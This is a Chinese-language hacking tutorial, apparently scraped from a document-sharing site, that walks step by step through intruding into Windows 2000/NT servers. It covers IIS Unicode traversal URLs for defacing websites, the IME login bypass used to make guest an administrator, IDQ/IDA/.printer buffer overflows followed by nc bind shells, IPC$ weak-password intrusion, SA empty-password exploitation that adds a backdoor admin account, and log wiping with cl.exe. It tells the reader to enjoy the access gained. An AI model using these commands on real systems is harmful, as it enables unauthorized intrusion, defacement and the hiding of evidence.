1、2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 22p Program Files 2002-01-23 06:21p c:当看到 的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。英文WIN2000 /scripts/.%c0%af./winnt/system32/cmd.exe?中文WIN2000 /scripts/.%c0%2f./winnt/system32/cmd.exe /scripts/.%c1%1c./winnt/system32/cmd.exe WIN NT4 /script
2、s/.%c1%9c./winnt/system32/cmd.exe 通用代码:/scripts/.%255c./winnt/system32/cmd.exe?(2) Windows2000输入法漏洞 先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” “输入法指南” “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:winntsystem32在该目录下找到“net.exe”,
3、为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” “目标”c:winntsystem32net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” “目标” c:winntsystem32net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端
4、服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。(3) idq溢出漏洞 要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出OK出现发送Shellcode成功的提示
5、了,然后我们用NC来连接。进入MS-DOS。进入“nc”的目录。然后:nc -v IP 813 nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) IP 813 (?): connection refused sent 0, rcvd 0: NOTSOCK 看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。) open Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-2000 Mic
6、rosoft Corp. WINNTsystem32哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。(4)IDA溢出漏洞 所用程序:idahack 进入MS-DOS方式(假设idq.exe在c:下) idahack.exe 运行参数:idahack hosttypeshellportchinese win2k : 1 chinese win2ksp1: 2 chinese win2ksp2: 3 english win2k : 4 english win2ksp1: 5 english win2ksp2: 6 japanese win2k : 7 japanese win
7、2ksp1: 8 japanese win2ksp2: 9 korea win2k : 10 korea win2ksp1: 11 korea win2ksp2: 12 chinese nt sp5 : 13 chinese nt sp6 : 14 idahack 127.0.0.1 80 1 80 connecting. sending. Now you can telnet to 80 port Good luck 好,现在你可以telnet它的80端口了,我们用NC来连接。nc 127.0.0.1 80 (C)版权所有 1985-1998 Microsoft Corp O
8、K,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。(5).printer漏洞 这个漏洞,我们用两个程序来入侵。iis5hack和nc。iis5hack iis5 remote .printer overflow. writen by sunx http:/www.sunx.org for test only, dont used to hack, :p usage: D:IIS5HACK.EXE HostPortHostTypeShellPort用法:IIS5HACK 主机的端口主机的类型溢出的端口chinese edition:0 chinese edition, sp1
9、:english edition:2 english edition, sp1:japanese edition:4 japanese edition, sp1:korea edition:6 korea edition, sp1:mexico edition:8 mexico edition, sp1:iis5hack 127.0.0.19 80 1 119 Listn: 80 Now you can telnet to 3739 port good luck :溢出成功!nc 127.0.0.19 119 (C) 版权所有 1985-2000 Microsoft Corp. OK,我们又成
10、功取得system权限!玩吧。(6)139端口入侵 我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。用到两个NET命令,下面就是这两个命令的使用方法 NET VIEW?作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?命令格式:net view computername | /domain:domainname?参数介绍:键入不带参数的net view显示当前域的计算机列表。2co
11、mputername 指定要查看其共享资源的计算机。3/domain:domainname指定要查看其可用计算机的域?NET USE?作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。net use devicename | * computernamesharenamevolume?password | * /user:domainnameusername /delete |?/persistent:yes | no?键入不带参数的net use列出网络连接。devicename指定要连接到的资源名称或要断开的设备名称。computernamesharename服务器及共
12、享资源的名称。password访问共享资源的密码。*提示键入密码。 /user指定进行连接的另外一个用户。domainname指定另一个域。username指定登录的用户名。/home将用户连接到其宿主目录?/delete取消指定网络连接。/persistent控制永久网络连接的使用。net use IP net view IP 我们已经看到对方共享了他的C,D,E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. nbtstat R 载入NBT快取 nbtstat c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击
13、开始-查找-计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。(7)IPC入侵 所有程序:流光 开始:在主界面选择 探测探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现
14、“IPC自动探测” 的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:net usefile:/对方ip/ipc$ 密码/user:用户名 | 建立远程连接 copy icmd.exe file:/对方ip/admin$ |admin$是对方的winnt目录 net time file:/对方IP/ |看看对方的本地时间 at file:/对方ip/ 启动程序的时间启动
15、程序名 启动程序的参数|用at命令来定时启动程序 telnet 对方ip端口 我们也可以改网页:net use ipipc$ admin /uesr: 回车。出现“命令成功完成”。然后输入“dir ipc$*.*” 看到C:下所有内容。现在我们来改主页。一般主页放在c:inetpubwwwroot里面 输入“dir ipc$inetpubwwwroot*.*”。就可以看到index.htm或index.asp或default.htm或default.asp.这些就是主页了,假如你黑页在C:下,就输入copy 主页文件 ipc$inetpubwwwroot覆盖原文件这样就行了,简单吧?日志清除,
16、断开连接 :我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file:/ip/ipc$ /delete (8)超管SA空密码漏洞 使用的工具:流光IV 启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。net user heiying hei
17、ying1 /add填加一个heiying的帐号和密码heiying1 net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。下面我们来做跳板:打开cmd.exe,输入net use 127.0.0.1ipc$ heiying1 /user:heiying命令 显示命令成功完成。上传srv.exe:copy srv.exe 127.0.0.1admin$system32 上传ntlm.exe:copy ntlm.exe 127.0.0.1admin$system32 启动服务:首先用net time 127.0.0.1 看看对方主机的时间,(假如回显127.0.0.1 的本地时间是上午12.00),然后我们用at 2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。一分钟后在本机命令提示符中输入:telnet . 99 然后我们要启动NTLM.exe:在telne
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1